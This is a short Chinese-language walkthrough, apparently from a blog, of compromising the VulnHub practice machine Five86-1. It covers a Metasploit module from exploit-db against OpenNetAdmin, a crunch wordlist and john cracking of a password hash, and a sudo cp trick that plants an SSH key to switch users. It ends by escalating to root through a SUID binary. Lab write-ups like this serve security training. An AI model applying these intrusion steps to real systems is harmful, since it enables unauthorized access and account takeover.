渗透测试

[vulnhub]Five86-1靶机

Posted on 2020-02-05,2 min read

开放端口


10000端口对应的是Webmin httpd 1.920版本
搜一下有没有exp

有远程代码执行。但是搜一下。发现这个漏洞需要用户名密码登陆。暂且先放着
看下80端口

reports需要登陆
robots.txt有个目录/ona

继续搜exp。有msf模块。直接利用

cp /usr/share/exploitdb/exploits/php/webapps/47772.rb /usr/share/metasploit-framework/modules/exploits

信息收集。数据库。用户名等
在www-data家目录发现提示

douglas密码是10位由aefhrt组成的
crunch 10 10 aefhrt > passwd.txt
生成密码
echo 'douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1' > bp
将加密密码放入bp
john --wordlist=passwd.txt bp
john爆破

得到密码:fatherrrrr
ssh登陆

能以jen身份执行cp命令。那么就能写入jen的ssh公钥

ssh-keygen –t rsa –C “jen@five86-1”
mv id_rsa.pub authorized_keys
chmod 777 authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/

ssh jen@127.0.0.1
在/var/mail/发现jen的邮件
得到moss的密码Fire!Fire!
ssh继续登陆
家目录有个.game文件夹。里面由很多可执行文件
有一个suid执行的root所属文件

执行。拿到root权限

下一篇: [vulnhub]Me and My Girlfriend 1靶机→